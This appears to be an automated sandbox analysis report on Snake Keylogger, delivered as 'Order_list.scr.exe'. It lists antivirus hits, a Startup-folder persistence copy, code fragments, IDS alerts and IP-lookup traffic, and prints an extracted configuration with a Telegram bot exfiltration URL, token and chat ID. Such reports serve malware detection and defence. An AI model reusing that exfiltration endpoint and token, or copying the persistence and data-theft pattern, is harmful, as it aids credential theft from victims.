2025-01-13T10:12:20.316790+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49750	132.226.247.73	80	TCP
2025-01-13T10:12:21.660532+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49756	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Order_list.scr.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Avira: detection malicious, Label: HEUR/AGEN.1309847

Found malware configuration

Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7888110857:AAH_lE30nomQfyzYUPPXbGWeGI9ffBUijsQ/sendMessage?chat_id=7222025033", "Token": "7888110857:AAH_lE30nomQfyzYUPPXbGWeGI9ffBUijsQ", "Chat_id": "7222025033", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: Order_list.scr.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Order_list.scr.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Order_list.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49733 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49751 version: TLS 1.0

Source: Order_list.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: Order_list.scr.exe, 00000000.00000002.4142462023.0000000002611000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000000.00000002.4171576105.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, 00.exe, 00000005.00000002.4140969217.0000000002931000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 0167F1F6h	3_2_0167F007
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 0167FB80h	3_2_0167F007
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_0167E528
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA72FAh	3_2_05DA7050
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA8945h	3_2_05DA8608
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA5441h	3_2_05DA5198
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA8459h	3_2_05DA81B0
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA8001h	3_2_05DA7D58
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA0FF1h	3_2_05DA0D48
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA7BA9h	3_2_05DA7900
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA0B99h	3_2_05DA08F0
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA0741h	3_2_05DA0498
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA7751h	3_2_05DA74A8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA02E9h	3_2_05DA0040
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA6E79h	3_2_05DA6BD0
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_05DA33B8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_05DA33A8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA6A21h	3_2_05DA6778
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA65C9h	3_2_05DA6320
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA6171h	3_2_05DA5EC8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_05DA36CE
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA5D19h	3_2_05DA5A70
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 4x nop then jmp 05DA58C1h	3_2_05DA5618
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 009AF1F6h	8_2_009AF018
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 009AFB80h	8_2_009AF018
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_009AE528
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_009AEB5B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_009AED3C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06321A38h	8_2_06321620
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 063202F1h	8_2_06320040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06321471h	8_2_063211C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632F8B9h	8_2_0632F610
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06321A38h	8_2_06321610
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632C8F1h	8_2_0632C648
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632D1A1h	8_2_0632CEF8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632DA51h	8_2_0632D7A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632DEA9h	8_2_0632DC00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632E759h	8_2_0632E4B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06320751h	8_2_063204A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632B791h	8_2_0632B4E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06321011h	8_2_06320D60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632F009h	8_2_0632ED60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632C041h	8_2_0632BD98
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632FD11h	8_2_0632FA68
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632CD49h	8_2_0632CAA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632D5F9h	8_2_0632D350
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632E301h	8_2_0632E058
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06320BB1h	8_2_06320900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632EBB1h	8_2_0632E908
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06321A38h	8_2_06321966
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632BBE9h	8_2_0632B940
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632F461h	8_2_0632F1B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 0632C499h	8_2_0632C1F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06358945h	8_2_06358608
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 063558C1h	8_2_06355618
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06355D19h	8_2_06355A70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06356171h	8_2_06355EC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 063565C9h	8_2_06356320
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06356A21h	8_2_06356778
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_063533B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_063533A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06356E79h	8_2_06356BD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 063572FAh	8_2_06357050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 063502E9h	8_2_06350040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06357751h	8_2_063574A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06350741h	8_2_06350498
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06350B99h	8_2_063508F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06357BA9h	8_2_06357900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06358001h	8_2_06357D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06350FF1h	8_2_06350D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06358459h	8_2_063581B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06355441h	8_2_06355198

Networking

Yara detected Generic Downloader

Source: Yara match

File source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:61409 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org

Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49756 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49762 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49768 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49733 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49751 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

